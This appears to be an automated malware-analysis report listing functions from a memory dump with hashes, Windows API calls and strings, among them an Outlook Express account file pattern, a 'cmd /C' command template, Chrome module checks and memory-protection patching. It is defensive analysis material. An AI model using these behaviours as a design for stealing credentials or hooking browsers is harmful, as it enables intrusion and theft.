  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
